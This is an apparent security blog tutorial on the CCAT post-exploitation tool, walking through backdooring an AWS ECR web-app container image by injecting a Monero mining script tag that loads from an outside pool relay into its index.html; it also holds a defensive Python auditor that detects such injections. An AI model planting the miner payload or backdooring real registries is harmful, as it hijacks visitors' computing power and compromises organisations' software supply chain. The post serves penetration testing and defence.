Cloud Container Attack Tool (CCAT) and Cryptojacking

Containerization revolutionized cloud computing and modern IT infrastructure. The convenience it created allows organizations to build, test and deploy software faster. However, container security was not addressed until recently, and many are still catching up on tools that secure cloud container environments. The shortage of such tools is another major concern for developers, and it prompted a cloud pentester at Rhino Security Labs, a Washington-based boutique penetration testing and security assessment firm, to develop the Cloud Container Attack Tool (also known as CCAT).

The What and How

CCAT is an open-source post-exploitation framework used to test the security of container environments on the AWS and GCP platforms. It lets pentesters and developers find out how a container environment could be backdoored once access has been obtained.

As mentioned earlier, CCAT is a post-exploitation framework, which means it assumes that your credentials or your GCP/AWS accounts have already been compromised. From there, you can explore repositories, pull images from the registry, create backdoors in the image and push them back into the repository. A typical scenario is shown in the image below from GitHub.

Installation of CCAT

One can very easily clone the repository to install CCAT as shown below:

$ git clone https://github.com/RhinoSecurityLabs/ccat.git

$ cd ccat

Before running CCAT, configure your AWS credentials with your current user. You can refer to this article to learn more about it.

Once it has been installed, type the following command in the CCAT directory:

$ docker run -it -v ~/.aws:/root/.aws/ -v /var/run/docker.sock:/var/run/docker.sock -v ${PWD}:/app/ rhinosecuritylabs/ccat:latest

CCAT and Cryptojacking

Cryptojacking is yet another reason for malicious actors to target container environments. Cryptojacking is the unauthorized use of someone else's computer to mine cryptocurrencies.

Crypto mining is a process in which a network of computers known as miners solve cryptographic puzzles in exchange for a payment. It is often quite expensive, requiring far more computing power than an ordinary computer can provide. Browser-based miners exist that run directly on a visitor's machine, but as stated above, a single machine is simply not enough.

To overcome this problem, threat actors host malicious websites that embed JavaScript mining code, so that whenever users visit the site, the attacker uses those users' CPU power to mine. This is how they carry out cryptojacking. In this blog, I will demonstrate a similar attack with the help of a mining pool.

Mining Pool

A mining pool is simply a group of crypto miners who pool resources over a network to improve their chances of successfully mining cryptocurrency. In this demo, we have used the Monero cryptocurrency. To get going, you need to create a Monero wallet address. You can use this link to do it.

Creating a Backdoor on Web App Container

Now let us try to create a backdoor in an existing container. We can use the container dubbed “backdoor-example” that was already pushed to AWS ECR. It is a simple Hello World Docker container. The Dockerfile for the container is given below:

FROM ubuntu:18.04

# Install dependencies
RUN apt-get update && \
    apt-get -y install apache2

# Write the hello world page served by Apache
RUN echo 'Hello World!' > /var/www/html/index.html

# Configure apache: write a small start script that runs it in the foreground
RUN echo '. /etc/apache2/envvars' > /root/run_apache.sh && \
    echo 'mkdir -p /var/run/apache2' >> /root/run_apache.sh && \
    echo 'mkdir -p /var/lock/apache2' >> /root/run_apache.sh && \
    echo '/usr/sbin/apache2 -D FOREGROUND' >> /root/run_apache.sh && \
    chmod 755 /root/run_apache.sh

EXPOSE 80

CMD /root/run_apache.sh

Now, let’s run the CCAT tool.

  • Firstly, we enumerate ECR repositories to configure the profile. Remember to configure AWS CLI credentials before this:

  • Once we select this option, we enter the AWS profile name as shown below:

  • Now, we select the respective region where the repository is stored.

  • Once you have selected the region, the tool automatically enumerates the repositories. It’s time to list the repositories in a table format.

  • This is the image we were able to create:

  • Now, we pull the repository as shown below, to make changes in the image. You can choose to pull all the enumerated repositories together or single repos:

  • Select the Docker Backdoor option:

  • Add all necessary details:

  • Here comes the crucial part. We used the javascript code taken from this GitHub page and overwrote the index.html file accordingly. Make sure to enter the exact pool name and port number.
<script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://?algo=cn/r?jason=gulf.moneroocean.stream:10008" > </script>

  • Once the backdoored docker image is built, we push it.

  • Ensure that you have provided accurate information:

  • We push the repository.
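The walkthrough above changes exactly one file in the image: the index.html that the Dockerfile writes, which gains an external script tag pointing at a mining-pool relay. The following is an added example, not part of CCAT or of the original post, showing how a defender can audit that file after pulling an image from the registry: it compares the file against the hash of what the build produced and flags any external script source, with the mining-pool indicators taken from the tag used in the walkthrough. The sample page contents are constructed here; the known-good hash is derived from the Dockerfile's own `echo 'Hello World!'` line.

```python
"""Audit a container's index.html for an injected cryptojacking loader.

Added example (not from CCAT or the original post). Two checks:
  1. content drift: does the file still match what the Dockerfile built?
  2. external scripts: does the page now load JavaScript from another host,
     and does that URL carry the markers of a browser miner loader?
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# sha256 of the exact bytes the Dockerfile writes:
#   RUN echo 'Hello World!' > /var/www/html/index.html
KNOWN_GOOD_SHA256 = hashlib.sha256(b"Hello World!\n").hexdigest()

# Indicators drawn from the injected tag in the walkthrough: a WebSocket
# relay, a CryptoNight algorithm selector, a pool host, a miner loader name.
MINER_PATTERNS = [
    re.compile(r"wss?://", re.I),
    re.compile(r"algo=cn", re.I),
    re.compile(r"moneroocean", re.I),
    re.compile(r"\bminer\b|\bmmh\.js\b|coinhive|cryptonight", re.I),
]

# Constructed samples: the page the Dockerfile writes, and the same page
# with the walkthrough's script tag appended to it.
CLEAN_INDEX = "Hello World!\n"
BACKDOORED_INDEX = CLEAN_INDEX + (
    '<script src="https://easyhash.de/mmh/mmh.js?perfekt=wss://'
    '?algo=cn/r?jason=gulf.moneroocean.stream:10008" > </script>\n'
)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def external_script_sources(html):
    """Return script src values that point at another host (have a netloc)."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return [s for s in parser.sources if urlparse(s).netloc]


def miner_indicators(url):
    """Return the patterns from MINER_PATTERNS that match the given URL."""
    return [p.pattern for p in MINER_PATTERNS if p.search(url)]


def audit_index_html(html, known_good_sha256=KNOWN_GOOD_SHA256):
    """Return a list of findings; an empty list means the file is as built."""
    findings = []
    digest = hashlib.sha256(html.encode()).hexdigest()
    if digest != known_good_sha256:
        findings.append(f"content drift: sha256 {digest[:12]}... differs from build output")
    for src in external_script_sources(html):
        host = urlparse(src).netloc
        hits = miner_indicators(src)
        if hits:
            findings.append(f"miner loader from {host}: matched {len(hits)} indicator(s)")
        else:
            findings.append(f"unexpected external script from {host}")
    return findings


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_INDEX), ("backdoored", BACKDOORED_INDEX)):
        print(label, audit_index_html(page) or ["no findings"])
```

In practice you would run `audit_index_html` over the file extracted from the pulled image (for example with `docker cp` from a stopped container), and pin the known-good hash at build time in CI rather than recomputing it by hand. The hash check catches any modification of the page; the script-source check explains the specific one the walkthrough makes.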

At its core, CCAT is an automation tool for post-exploitation scenarios. We can perform similar attacks against GCP as well. Be cautious while performing such attacks and only do it in environments where you have permission.

For more information on CCAT, visit GitHub.
